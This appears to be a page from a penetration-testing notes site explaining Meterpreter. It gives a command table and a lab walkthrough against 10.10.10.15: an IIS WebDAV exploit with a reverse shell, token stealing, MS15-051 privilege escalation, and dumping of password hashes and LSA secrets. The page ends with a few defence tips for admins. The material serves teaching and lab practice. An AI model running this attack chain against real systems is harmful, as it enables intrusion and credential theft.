🛠️ Meterpreter

💻 How Meterpreter Works

Upon successful exploit:

Stager executed (e.g., bind, reverse TCP).
Reflective DLL loading (injects Meterpreter DLL).
AES-encrypted communication established.
Extensions loaded (e.g., stdapi, priv).

📌 Common Commands

meterpreter > help

Command

Description

background / bg

Background current session

migrate

Migrate to another process

getuid

Show user identity

ps

List processes

steal_token

Impersonate another user

hashdump

Extract password hashes

lsa_dump_sam

Dump SAM database

lsa_dump_secrets

Extract LSA secrets

pivot

Manage pivot listeners

load

Load meterpreter extensions

resource

Execute commands from file

sleep

Pause and resume connection quietly

secure

Renegotiate encryption

🔎 Meterpreter Practical Example

Start the MSFDB

msfdb run

Refer back to 🗄️ Database to see how to setup

Step-by-step Exploitation Process

1️⃣ Reconnaissance with Nmap

msf6 > db_nmap -sV -p- -T5 -A 10.10.10.15

Identifies:

Port 80: Microsoft IIS httpd 6.0
Possible WebDAV vulnerabilities.

2️⃣ Searching and Using Exploit

msf6 > search iis_webdav_upload_asp
msf6 > use exploit/windows/iis/iis_webdav_upload_asp

Set target options:

msf6 exploit(...) > set RHOST 10.10.10.15
msf6 exploit(...) > set LHOST tun0
msf6 exploit(...) > run

3️⃣ Gaining Meterpreter Shell

Successful exploit gives Meterpreter shell.
Files may remain on the victim (cleanup attempt may fail).

4️⃣ Initial Privilege Check

meterpreter > getuid

If privileges insufficient, attempt token stealing:

meterpreter > ps
meterpreter > steal_token [PID]
meterpreter > getuid

5️⃣ Local Privilege Escalation

If necessary, use the local exploit suggester:

meterpreter > bg
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(...) > set SESSION [ID]
msf6 post(...) > run

Exploit suggested vulnerabilities:

msf6 > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(...) > set SESSION [ID]
msf6 exploit(...) > set LHOST tun0
msf6 exploit(...) > run

6️⃣ Achieving SYSTEM Privileges

Check final privileges:

meterpreter > getuid
# Server username: NT AUTHORITY\SYSTEM

📂 Post-Exploitation Activities

With SYSTEM-level access, further activities include:

Extracting hashes:

meterpreter > hashdump

Dumping LSA secrets:

meterpreter > lsa_dump_secrets

Pivoting within the network, impersonating users, and accessing internal resources.

🛡️ Defense Tips (For Admins)

Monitor filesystem for suspicious files (e.g., .asp, .tmp files).
Use regex signatures to detect Meterpreter artifacts.
Implement robust security measures (IDS/IPS) to detect exploitation attempts early.

Previous🔁 Sessions NextAdditional Features

Last updated 10 months ago

hashtag💻 How Meterpreter Works

hashtag📌 Common Commands

hashtag🔎 Meterpreter Practical Example

hashtagStart the MSFDB

hashtagStep-by-step Exploitation Process

hashtag1️⃣ Reconnaissance with Nmap

hashtag2️⃣ Searching and Using Exploit

hashtag3️⃣ Gaining Meterpreter Shell

hashtag4️⃣ Initial Privilege Check

hashtag5️⃣ Local Privilege Escalation

hashtag6️⃣ Achieving SYSTEM Privileges

hashtag📂 Post-Exploitation Activities

hashtag🛡️ Defense Tips (For Admins)